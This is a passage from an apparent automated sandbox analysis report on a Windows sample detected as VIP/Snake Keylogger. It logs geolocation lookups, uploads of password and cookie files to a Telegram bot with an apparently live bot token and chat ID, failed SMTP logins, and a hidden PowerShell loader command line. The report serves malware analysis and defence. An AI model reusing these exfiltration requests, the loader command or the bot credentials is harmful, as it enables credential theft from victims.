York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49990	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:07:40 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865249 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xm%2BFCPWFPHjTQszeYJ24ScMmQ1tLu4JviNrxaGHseOScPY6P%2BLLvR7yyVQQ8G132UHFdP9bVVFmvG5vT9msBikWrJJfU%2B%2FUuTp1Nb8U6FVID%2BXrdw0d1A%2BvmlltN76zB4LkzOOaE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000531c298c8ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1735&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1618625&cwnd=215&unsent_bytes=0&cid=b151724fd2815951&ts=147&x=0"
2025-01-10 23:07:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49992	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:07:42 UTC	863	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865251 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2mJPr%2FgFZlcui1%2BBAXS11EJJfLwkI%2FjwXGXGg4u85afqWqbcl%2F%2By3We%2Fev2n9n9snWDg1IbVpIT5W0jdgxkmhhfL%2Bq8CNle9kQ91BLIeTE12yKxOg4Yp6LdkXepABIP3am0TdSA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90005324ce3c41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1731&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1647855&cwnd=192&unsent_bytes=0&cid=a50f6d69981836a0&ts=136&x=0"
2025-01-10 23:07:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49994	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:07:43 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865252 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IiypBuvATpFovxv5sJLPOKFtDDVgeBdcsgPK0hks5OFh9nDO4EP%2F759UouD6fVRd3OyBAvJG8WO8NI0QTsnLbHAZ2jiW0xryx4Bg%2BdWp12s59I%2Bkf4oC%2Fcf%2Bk8Y4ex2X9GPdErhk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000532d2aa77293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2067&min_rtt=2060&rtt_var=788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1375412&cwnd=158&unsent_bytes=0&cid=885668bc8c991da6&ts=160&x=0"
2025-01-10 23:07:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49996	104.21.16.1	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:07:44 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865253 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hkxjxngj3h2xCWrFoBHRJZzqbd4q7hDuaTjqxB93O0Vt7l4AptAisy8fniroJHUmyAsK7LKu1TMELntmzGTB8Ji7PD5%2B1Wa68SxdEgMWT3WqrJRC69LOPGU0vT5fEi799hhhYphS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900053354e988ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1789&rtt_var=689&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1567364&cwnd=215&unsent_bytes=0&cid=73c057f1e91b7e69&ts=127&x=0"
2025-01-10 23:07:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49997	149.154.167.220	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:45 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 23:07:45 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 23:07:45 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 23:07:45 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49999	149.154.167.220	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:08:03 UTC	366	OUT	POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd3282708daf7e Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2025-01-10 23:08:03 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 38 32 37 30 38 64 61 66 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 34 38 37 30 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 38 3a 30 37 3a 33 31 0d 0a Data Ascii: --------------------------8dd3282708daf7eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:048707Date and Time: 10/01/2025 / 18:07:31
2025-01-10 23:08:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 23:08:03 GMT Content-Type: application/json Content-Length: 502 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 23:08:03 UTC	502	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 30 31 34 39 37 30 33 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 6f 64 66 61 74 68 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 6f 64 66 61 75 64 61 31 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 37 31 33 33 38 33 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 66 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 35 30 34 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 50 57 5f 52 65 63 6f Data Ascii: {"ok":true,"result":{"message_id":663,"from":{"id":8101497037,"is_bot":true,"first_name":"godfather","username":"godfauda12bot"},"chat":{"id":7171338311,"first_name":"Df","last_name":"T","type":"private"},"date":1736550483,"document":{"file_name":"PW_Reco

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	50001	149.154.167.220	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:08:13 UTC	348	OUT	POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd32ae06876375 Host: api.telegram.org Content-Length: 1277
2025-01-10 23:08:13 UTC	1277	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 61 65 30 36 38 37 36 33 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 62 72 6f 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 34 38 37 30 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 Data Ascii: --------------------------8dd32ae06876375Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:048707Date and Time: 10/01/2025 /
2025-01-10 23:08:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 23:08:13 GMT Content-Type: application/json Content-Length: 513 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 23:08:13 UTC	513	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 30 31 34 39 37 30 33 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 6f 64 66 61 74 68 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 6f 64 66 61 75 64 61 31 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 37 31 33 33 38 33 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 66 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 35 30 34 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 Data Ascii: {"ok":true,"result":{"message_id":664,"from":{"id":8101497037,"is_bot":true,"first_name":"godfather","username":"godfauda12bot"},"chat":{"id":7171338311,"first_name":"Df","last_name":"T","type":"private"},"date":1736550493,"document":{"file_name":"Cookies

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 11, 2025 00:08:00.259912968 CET	587	49998	82.194.91.193	192.168.2.10	220-hs-1975.servidores-dedicados.es ESMTP Exim 4.96.2 #2 Sat, 11 Jan 2025 00:07:59 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 11, 2025 00:08:00.260166883 CET	49998	587	192.168.2.10	82.194.91.193	EHLO 048707
Jan 11, 2025 00:08:00.477761030 CET	587	49998	82.194.91.193	192.168.2.10	250-hs-1975.servidores-dedicados.es Hello 048707 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 11, 2025 00:08:00.478063107 CET	49998	587	192.168.2.10	82.194.91.193	AUTH login YWJyYWhlckBhYnJhaGVyLmNvbQ==
Jan 11, 2025 00:08:00.682663918 CET	587	49998	82.194.91.193	192.168.2.10	334 UGFzc3dvcmQ6
Jan 11, 2025 00:08:02.455560923 CET	587	49998	82.194.91.193	192.168.2.10	535 Incorrect authentication data
Jan 11, 2025 00:08:02.455827951 CET	49998	587	192.168.2.10	82.194.91.193	MAIL FROM:<abraher@abraher.com>
Jan 11, 2025 00:08:02.655241966 CET	587	49998	82.194.91.193	192.168.2.10	550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)
Jan 11, 2025 00:08:05.828849077 CET	587	50000	82.194.91.193	192.168.2.10	220-hs-1975.servidores-dedicados.es ESMTP Exim 4.96.2 #2 Sat, 11 Jan 2025 00:08:04 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 11, 2025 00:08:05.829058886 CET	50000	587	192.168.2.10	82.194.91.193	EHLO 048707
Jan 11, 2025 00:08:06.030777931 CET	587	50000	82.194.91.193	192.168.2.10	250-hs-1975.servidores-dedicados.es Hello 048707 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 11, 2025 00:08:06.031033039 CET	50000	587	192.168.2.10	82.194.91.193	AUTH login YWJyYWhlckBhYnJhaGVyLmNvbQ==
Jan 11, 2025 00:08:10.251218081 CET	587	50000	82.194.91.193	192.168.2.10	334 UGFzc3dvcmQ6
Jan 11, 2025 00:08:12.460294008 CET	587	50000	82.194.91.193	192.168.2.10	535 Incorrect authentication data
Jan 11, 2025 00:08:12.461553097 CET	50000	587	192.168.2.10	82.194.91.193	MAIL FROM:<abraher@abraher.com>
Jan 11, 2025 00:08:12.660594940 CET	587	50000	82.194.91.193	192.168.2.10	550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

Target ID:	0
Start time:	18:06:26
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\Kb94RzMYNf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Kb94RzMYNf.exe"
Imagebase:	0x400000
File size:	783'354 bytes
MD5 hash:	EE18481E218CC9BC7A1628F5A7365776
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:06:27
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
Imagebase:	0xdf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:06:27
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:07:17
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x9a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22%
Total number of Nodes:	1265
Total number of Limit Nodes:	39

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C3
GetVersion.KERNEL32 ref: 004032C9
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
#17.COMCTL32(00000007,00000009), ref: 00403315
OleInitialize.OLE32(00000000), ref: 0040331C
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
GetCommandLineW.KERNEL32(Janushoveds Setup,NSIS Error), ref: 0040334D
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000), ref: 00403360
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000020), ref: 00403387

Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
DeleteFileW.KERNELBASE(1033), ref: 00403527

Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Janushoveds Setup,NSIS Error), ref: 0040605D

OleUninitialize.OLE32(?), ref: 004035F2
ExitProcess.KERNEL32 ref: 00403613
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 00403626
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 00403635
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 00403640
